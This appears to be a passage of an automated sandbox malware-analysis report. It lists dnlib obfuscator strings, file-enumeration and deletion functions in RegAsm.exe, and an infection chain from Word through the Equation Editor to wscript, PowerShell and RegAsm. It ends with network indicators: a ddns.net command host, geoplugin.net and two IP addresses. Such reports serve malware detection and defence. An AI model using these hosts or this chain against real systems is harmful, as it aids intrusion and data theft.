                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0044E879 FindFirstFileExA,8_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040783C FindFirstFileW,FindNextFileW,8_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407C97

                Software Vulnerabilities

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global traffic DNS query: name: tochisglobal.ddns.net
                Source: global traffic DNS query: name: geoplugin.net
                Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.245.123.11:80
                Source: global traffic TCP traffic: 192.168.2.22:49164 -> 198.46.176.133:80
